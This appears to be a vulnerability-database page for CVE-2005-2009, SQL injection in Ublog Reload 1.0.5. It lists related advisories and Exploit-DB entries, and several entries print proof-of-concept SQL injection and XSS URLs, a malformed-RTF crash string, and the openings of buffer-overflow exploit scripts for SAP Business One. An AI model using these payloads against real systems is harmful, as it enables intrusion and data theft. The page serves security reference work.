CVE-2005-2009
published 2005-06-20CVE-2005-2009: Multiple SQL injection vulnerabilities in Ublog Reload 1.0.5 allow remote attackers to execute arbitrary SQL commands via the (1) ci, (2) d, or (3) m parameter…
PriorityP338high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.17%
63.6th percentile
Multiple SQL injection vulnerabilities in Ublog Reload 1.0.5 allow remote attackers to execute arbitrary SQL commands via the (1) ci, (2) d, or (3) m parameter to index.asp, or the (4) bi parameter to blog_comment.asp.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ublog | reload | — | — |
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-xw66-7hgg-w34f: Multiple SQL injection vulnerabilities in Ublog Reload 1
ghsa_unreviewed·2022-05-01
CVE-2005-2009 [HIGH] GHSA-xw66-7hgg-w34f: Multiple SQL injection vulnerabilities in Ublog Reload 1
Multiple SQL injection vulnerabilities in Ublog Reload 1.0.5 allow remote attackers to execute arbitrary SQL commands via the (1) ci, (2) d, or (3) m parameter to index.asp, or the (4) bi parameter to blog_comment.asp.
Red Hat
kernel: tcf_fill_node() infoleak due to typo in 9ef1d4c7
vendor_redhat·2009-10-08·CVSS 4.9
CVE-2009-3612 [MEDIUM] kernel: tcf_fill_node() infoleak due to typo in 9ef1d4c7
kernel: tcf_fill_node() infoleak due to typo in 9ef1d4c7
The tcf_fill_node function in net/sched/cls_api.c in the netlink subsystem in the Linux kernel 2.6.x before 2.6.32-rc5, and 2.4.37.6 and earlier, does not initialize a certain tcm__pad2 structure member, which might allow local users to obtain sensitive information from kernel memory via unspecified vectors. NOTE: this issue exists because of an incomplete fix for CVE-2005-4881.
Statement: This issue is not planned to be fixed in Red Hat Enterprise Linux 3 due to this product being in Production 3 of its maintenance life-cycle, where only qualified security errata of important or critical impact are addressed.
For further information about the Errata Support Policy, visit: https://access.redhat.com/support/policy/updates/errata/
Red Hat
php: exif_read_data crash on corrupted JPEG files
vendor_redhat·2009-06-18·CVSS 5.0
CVE-2009-2687 [MEDIUM] php: exif_read_data crash on corrupted JPEG files
php: exif_read_data crash on corrupted JPEG files
The exif_read_data function in the Exif module in PHP before 5.2.10 allows remote attackers to cause a denial of service (crash) via a malformed JPEG image with invalid offset fields, a different issue than CVE-2005-3353.
Red Hat
firefox: does not properly prevent the literal rendering of homoglyph characters in IDN domain names (spoof URLs and conduct phishing attacks)
vendor_redhat·2009-02-16·CVSS 7.5
CVE-2009-0652 [HIGH] firefox: does not properly prevent the literal rendering of homoglyph characters in IDN domain names (spoof URLs and conduct phishing attacks)
firefox: does not properly prevent the literal rendering of homoglyph characters in IDN domain names (spoof URLs and conduct phishing attacks)
The Internationalized Domain Names (IDN) blacklist in Mozilla Firefox 3.0.6 and other versions before 3.0.9; Thunderbird before 2.0.0.21; and SeaMonkey before 1.1.15 does not include box-drawing characters, which allows remote attackers to spoof URLs and conduct phishing attacks, as demonstrated by homoglyphs of the / (slash) and ? (question mark) characters in a subdomain of a .cn domain name, a different vulnerability than CVE-2005-0233. NOTE: some third parties claim that 3.0.6 is not affected, but much older versions perhaps are affected.
No detection rules found.
Exploit-DB
SAP Business One License Manager 2005 - Remote Buffer Overflow (Metasploit)
exploitdb·2010-11-30
CVE-2009-4988 SAP Business One License Manager 2005 - Remote Buffer Overflow (Metasploit)
SAP Business One License Manager 2005 - Remote Buffer Overflow (Metasploit)
---
##
# $Id: sap_2005_license.rb 11180 2010-11-30 20:19:18Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'SAP Business One License Manager 2005 Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the SAP Business One 2005
License Manager 'NT Naming Service' A and B releases. By sending an
excessively long string the stack is overwritten enabling arbitrary
code execution.
},
'Author' => 'Jacopo Cervini',
'Version' => '$Re
Exploit-DB
paFileDB 3.1 - Cross-Site Scripting
exploitdb·2009-12-26
CVE-2005-0952 paFileDB 3.1 - Cross-Site Scripting
paFileDB 3.1 - Cross-Site Scripting
---
| # Title : paFileDB 3.1 Cross Site Scripting Vulnerability |
| # Author : indoushka |
| # email : [email protected] |
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) |
| # EDB-ID : 10667 |
| # CVE-ID : () |
| # OSVDB-ID : () |
| # DAte :16/12/2009 |
| # Verified : |
| # Web Site : www.iq-ty.com |
| # Published: |
| # Script : paFileDB 3.1 ����� ������ ���� ���� http://www.bwady.com/vb |
| # Tested on: windows SP2 Fran�ais V.(Pnx2 2.0) + Lunix Fran�ais v.(9.4 Ubuntu) |
| # Bug : XSS |
====================== Exploit By indoushka =================================
| # Exploit :
|
| 1- http://127.0.0.1/tools/pafiledb.php?action=email&id=1>">alert(213771818860)%3B&rate=dorate&rating=1&B1=hacked%20by%20indoushka
|
=======
Exploit-DB
TomatoCart - Backup
exploitdb·2009-12-26
TomatoCart - Backup
TomatoCart - Backup
---
| # Title : TomatoCart Backup Vulnerability |
| # Author : indoushka |
| # email : [email protected] |
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) |
| # EDB-ID : 10683 |
| # CVE-ID : () |
| # OSVDB-ID : () |
| # DAte :16/12/2009 |
| # Verified : |
| # Web Site : www.iq-ty.com |
| # Published: |
| # Script : Powered by TomatoCart (Copyright (c) 2009 Wuxi Elootec Technology Co., Ltd; Copyright (c) 2005 osCommerce)
| # Tested on: windows SP2 Fran�ais V.(Pnx2 2.0) + Lunix Fran�ais v.(9.4 Ubuntu) |
| # Bug : Backup |
====================== Exploit By indoushka =================================
| # Exploit :
|
| 1- http://127.0.0.1/tomatocart/admin/backups/
|
| 2- look in lin 42 u find the user and pass
|
============================
Exploit-DB
vCard PRO 3.1 - Cross-Site Scripting
exploitdb·2009-12-26
vCard PRO 3.1 - Cross-Site Scripting
vCard PRO 3.1 - Cross-Site Scripting
---
| # Title : vCard PRO 3.1 Cross Site Scripting Vulnerability |
| # Author : indoushka |
| # email : [email protected] |
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) |
| # EDB-ID : 10670 |
| # CVE-ID : () |
| # OSVDB-ID : () |
| # DAte :16/12/2009 |
| # Verified : |
| # Web Site : www.iq-ty.com |
| # Published: |
| # Script : Powered by vCard PRO 3.1 Translated by SCDT - SWiSHE Cards : SWiSHE.NeT �2005
| # Tested on: windows SP2 Fran�ais V.(Pnx2 2.0) + Lunix Fran�ais v.(9.4 Ubuntu) |
| # Bug : XSS |
====================== Exploit By indoushka =================================
| # Exploit :
|
| 1- http://127.0.0.1:80/vcard/newcards.php?page=1alert(+213771818860)
| 2- http://127.0.0.1/vcard/create.php?card_id=1>">a
Exploit-DB
ActiveBuyandSell 6.2 - 'buyersend.asp?catid' Blind SQL Injection
exploitdb·2009-12-17
CVE-2005-2062 ActiveBuyandSell 6.2 - 'buyersend.asp?catid' Blind SQL Injection
ActiveBuyandSell 6.2 - 'buyersend.asp?catid' Blind SQL Injection
---
[?] ?????????????????????????{In The Name Of Allah The Mercifull}??????????????????????
[?]
[~] Tybe: (buyersend.asp catid) Blind SQL Injection Vulnerability
[~] Vendor: :www.activewebsoftwares.com
[*] Software: ActiveBuyandSell v 6.2
[*] author: ((R3d-D3v!L))
[*] Date: 18.dec.2009
[*] T!ME: 12:00 am
[?] Home: WwW.xP10.ME
[?] contact: N/A
[?]
[?]??????????????????????{DEV!L'5 of SYST3M}??????????????????
[*] Err0r C0N50L3:
[*] http://server/demoactivebuyandsell/buyersend.asp?catid={offsec}
[*]{offsec}
7Ru3 : buyersend.asp?catid=1 and 1=1
f4L53: buyersend.asp?catid=1 and 1=2
N073:
! 7h!/\/k u can f!nd m0r3
just let your m1nd breath ;)
! GAZA !N 0uR HEART's blood and M!ND
[~]-----------------------------{D3V!L
Exploit-DB
SAP Business One 2005-A License Manager - Remote Buffer Overflow
exploitdb·2009-08-01
CVE-2009-4988 SAP Business One 2005-A License Manager - Remote Buffer Overflow
SAP Business One 2005-A License Manager - Remote Buffer Overflow
---
#!/usr/bin/python
import socket, time
#########################################INFO################################################
# NT_Naming_Service.exe (License Manager 2005 for SAP Business One 2005-A) is #
# vulnerable to a stack-based buffer overflow allowing for full system compromise by #
# an unauthenticated user that has TCP/IP access to SAP's license service on TCP port 30000.#
# Mike Arnold ---> mikey27 .::at::. hotmail.com #
############################################################################################
header = ("########################################################################\r\n"
"# SAP Business One 2005-A License Manager remote overflow PoC #\r\n"
"# Tested on 2005-A (6.80.123)
Exploit-DB
phpDirectorySource 1.0 - Cross-Site Scripting / SQL Injection
exploitdb·2009-07-21
CVE-2009-4681 phpDirectorySource 1.0 - Cross-Site Scripting / SQL Injection
phpDirectorySource 1.0 - Cross-Site Scripting / SQL Injection
---
[»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
[»] Web Business Directory 1.0 (search.php) Multiple Remote Vulnerabilities
[»] Script: [ Web Business Directory 1.0 ]
[»] Language: [ PHP ]
[»] Download: [ http://www.phpdirectorysource.com/ ]
[»] Founder: [ Moudi ]
[»] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
[»] Team: [ EvilWay ]
[»] Dork: [ Copyright 2005-2006 phpDirectorySource™, all rights reserved ]
[»] Price: [ $75.00 ]
[»] Site : [ https://security-shell.ws/forum.php ]
###########################################################################
===[ Exploit SQL INJECTION + LIVE : vulnerability ]===
[»] http://www.site.com/patch/search.php?sa=site&sk=a&nl=11&st=
[»
Exploit-DB
QIP 2005 - Malformed Rich Text Message Remote Denial of Service
exploitdb·2009-02-04
CVE-2009-0769 QIP 2005 - Malformed Rich Text Message Remote Denial of Service
QIP 2005 - Malformed Rich Text Message Remote Denial of Service
---
source: https://www.securityfocus.com/bid/33609/info
QIP 2005 is prone to a remote denial-of-service vulnerability.
Exploiting this issue may allow attackers to cause the application to hang and consume excessive computer resources, denying service to legitimate users.
NOTE: This issue may occur in a third-party component used by QIP 2005, but this has not been confirmed.
This issue affects QIP 2005 build 8082; other versions may also be vulnerable.
{\rtf\pict\&&}
Exploit-DB
Joomla! Component gigCalendar 1.0 - SQL Injection
exploitdb·2009-01-13
CVE-2009-0726 Joomla! Component gigCalendar 1.0 - SQL Injection
Joomla! Component gigCalendar 1.0 - SQL Injection
---
#############################################################
Joomla Component com_gigcal(gigcal_gigs_id) SQL-injection
#############################################################
###################################################
#[~] Author : boom3rang
#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
#[~] Vulnerability : SQL injection
#[~] Google Dork : inurl:com_gigcal
#[!] Name : GigCalendar
#[!] creationDate : Dec 2005
#[!] Created by : Graham Spice, David Richards
#[!] AuthorEmail : [email protected]
#[!] Site : www.gigcalendar.net
#[!] Version : 1.0
#[!] Download : http://joomlacode.org/gf/project/gigcalendar/frs/?action=FrsReleaseBrowse&frs_package_id=214
################################
Exploit-DB
Ublog Reload 1.0.5 - 'index.asp' Multiple SQL Injections
exploitdb·2005-06-20
CVE-2005-2009 Ublog Reload 1.0.5 - 'index.asp' Multiple SQL Injections
Ublog Reload 1.0.5 - 'index.asp' Multiple SQL Injections
---
source: https://www.securityfocus.com/bid/13991/info
Ublog Reload is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
http://www.example.com/UblogReload/index.asp?ci='62&s=category
http://www.example.com/UblogReload/index.asp?d=11'&m=6&y=2005&s=day
http://www.example.com/UblogReload/index.asp?m=6'&y=2005&s=month
Exploit-DB
Ublog Reload 1.0.5 - 'blog_comment.asp?y' SQL Injection
exploitdb·2005-06-20
CVE-2005-2009 Ublog Reload 1.0.5 - 'blog_comment.asp?y' SQL Injection
Ublog Reload 1.0.5 - 'blog_comment.asp?y' SQL Injection
---
source: https://www.securityfocus.com/bid/13991/info
Ublog Reload is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
http://www.example.com/UblogReload/blog_comment.asp?bi=71&m=6&y=2005'&d=&s=category
Exploit-DB
Sun Solaris AnswerBook2 - Multiple Cross-Site Scripting Vulnerabilities
exploitdb·2005-05-07·CVSS 4.3
CVE-2005-0549 [MEDIUM] Sun Solaris AnswerBook2 - Multiple Cross-Site Scripting Vulnerabilities
Sun Solaris AnswerBook2 - Multiple Cross-Site Scripting Vulnerabilities
---
Sun Solaris AnswerBook2 is reported prone to multiple cross-site scripting vulnerabilities because the software fails to properly sanitize user-supplied data. Exploits will allow arbitrary HTML and script code to run in a victim's browser, allowing the attacker to steal cookie-based credentials and launch other attacks.
The Search function and the AnswerBook2 admin interface are affected.
AnswerBook2 1.4.4 and prior versions are vulnerable.
Bugtraq ID: 12746
Class: Input Validation Error
CVE: CVE-2005-0548
CVE-2005-0549
Remote: Yes
Local: No
Published: Mar 07 2005 12:00AM
Updated: Dec 11 2009 03:44PM
Credit: Discovery is credited to Thomas Liam Romanis.
Vulnerable: Sun AnswerBook2 1.4.4
Sun AnswerBook2 1.4.3
S
2005-06-20
Published